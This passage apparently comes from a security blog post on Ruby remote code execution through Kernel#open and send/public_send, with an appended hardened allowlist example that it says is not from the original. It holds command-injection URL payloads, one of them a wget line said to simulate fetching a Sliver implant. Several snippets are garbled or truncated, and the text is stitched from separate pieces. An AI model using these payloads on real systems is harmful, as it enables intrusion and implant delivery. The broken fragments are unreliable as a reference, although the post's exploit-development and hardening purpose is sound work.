This is the most straightforward Ruby-specific RCE vulnerability this blog post will discuss. If the built-in Ruby open function is called with user-supplied input in a Rails request handler, like this:

    open(params)

then that request handler is vulnerable to arbitrary OS command execution, simply by the attacker setting the first character of the input to a pipe character (|). In the example, it can be exploited by accessing a URL such as:

    |date%3E%3E/tmp/rce1.txt

…which will execute the proof-of-concept shell command date > /tmp/rce1.txt, or:

    |wget%20

…which simulates downloading and executing a Sliver implant.

In the remainder of this post, the example shell commands are variations on date > /tmp/rce1.txt. This is one of my go-tos for exploit development because it's harmless and gives me a log of every time the exploit was successful, not just the most recent (like touch /tmp/rce1.txt would).

Ruby objects have a pair of interesting shorthand functions named send and public_send that accept a method name as a string, and then a variable number of arguments that should be passed to the method identified by the first argument. Ruby developers can use them to make certain parts of their code more flexible. For example, the following code can be used to pass the same input to three different functions within a custom class:

    puts "Arguments: " + args.join(', ').downcase

Because the functions are identified by strings, not symbols, the method(s) to call can even be specified in user-supplied input.

    nd(mn, "a", "b", "c", "A", "B", "C")
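The two patterns this post covers (open called on request input, and send/public_send with a request-chosen method name) in a hardened form, as an added example that is not code from the original post. safe_read, Formatter, DISPATCHABLE and dispatch are hypothetical names, and the class is a constructed stand-in for the post's custom class.

```ruby
# Added example (not from the original post); all names here are hypothetical.

# Read a user-named file from under base_dir only. File.file?/File.read treat a
# leading "|" as part of a literal file name; they never spawn a command the
# way Kernel#open does.
def safe_read(base_dir, user_path)
  base = File.realpath(base_dir)
  full = File.expand_path(user_path.to_s, base)
  # Resolve symlinks, then require the result to stay inside base_dir.
  real = File.file?(full) ? File.realpath(full) : nil
  unless real && real.start_with?(base + File::SEPARATOR)
    raise ArgumentError, "not a readable file under the base directory"
  end
  File.read(real)
end

# Constructed stand-in for the post's "custom class" with three functions.
class Formatter
  # Only these names may be selected by request input.
  DISPATCHABLE = %w[lower upper count].freeze

  def lower(*args)
    args.join(", ").downcase
  end

  def upper(*args)
    args.join(", ").upcase
  end

  def count(*args)
    args.length
  end

  # public_send refuses private methods (Kernel#system, #eval, #exec), but it
  # still reaches public ones such as instance_eval and send, so the allowlist
  # is the actual control.
  def dispatch(name, *args)
    unless DISPATCHABLE.include?(name.to_s)
      raise ArgumentError, "method not allowed: #{name.inspect}"
    end
    public_send(name, *args)
  end
end
```

In a Rails handler the string passed to safe_read or dispatch would be a single request parameter value, never the whole params object.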